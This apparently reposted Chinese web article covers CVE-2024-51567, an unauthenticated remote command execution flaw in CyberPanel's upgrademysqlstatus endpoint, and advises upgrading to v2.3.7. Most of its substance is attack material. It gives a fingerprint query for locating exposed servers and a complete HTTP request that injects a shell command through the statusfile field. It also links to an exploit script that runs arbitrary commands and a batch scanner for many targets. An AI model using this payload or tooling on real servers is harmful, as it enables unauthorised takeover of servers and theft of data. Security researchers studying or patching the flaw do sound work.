CVE-2024-51567 CyberPanel upgrademysqlstatus 远程命令执行

28 阅读 0 评论 0 点赞

该漏洞源于upgrademysqlstatus接口未做身份验证和参数过滤，未授权的攻击者可以通过此接口执行任意命令获取服务器权限，从而造成数据泄露、服务器被接管等严重的后果。

影响版本

CyberPanel v2.3.5
CyberPanel v2.3.6

目前官方已有可更新版本，建议受影响用户升级至最新版本：CyberPanel >= v2.3.7

漏洞复现

app="CyberPanel"

OPTIONS /dataBases/upgrademysqlstatus HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Type: application/json
Connection: close
 
{"statusfile":"/dev/null; id; #"}

漏洞利用poc

CVE-2024-51567.py url 命令

漏洞批量检测poc

url需要放在当前路径url.txt文件中，使用线程池并发请求。直接执行脚本即可。代码已上传：https://download.csdn.net/download/qq_44159028/89938884?spm=1001.2014.3001.5501

本站资源均来自互联网，仅供研究学习，禁止违法使用和商用，产生法律纠纷本站概不负责！如果侵犯了您的权益请与我们联系！

转载请注明出处：免费源码网-免费的源码资源网站 » CVE-2024-51567 CyberPanel upgrademysqlstatus 远程命令执行

点赞(0) 打赏

本文分类：文章资讯
本文标签：CVE-2024-51567 CyberPanel upgrademysqlstatus 远程命令执行
浏览次数：28 次浏览
本文链接：https://freeymw.com/article/35361.html

上一篇 > NoSQL之 Redis配置与优化
下一篇 > Uniapp 实现app自动检测更新/自动更新功能

CVE-2024-51567 CyberPanel upgrademysqlstatus 远程命令执行

影响版本

漏洞复现

漏洞利用poc

漏洞批量检测poc

评论列表共有 0 条评论

发表评论取消回复

CVE-2024-51567 CyberPanel upgrademysqlstatus 远程命令执行

影响版本

漏洞复现

漏洞利用poc

漏洞批量检测poc

评论列表 共有 0 条评论

发表评论 取消回复

评论列表共有 0 条评论

发表评论取消回复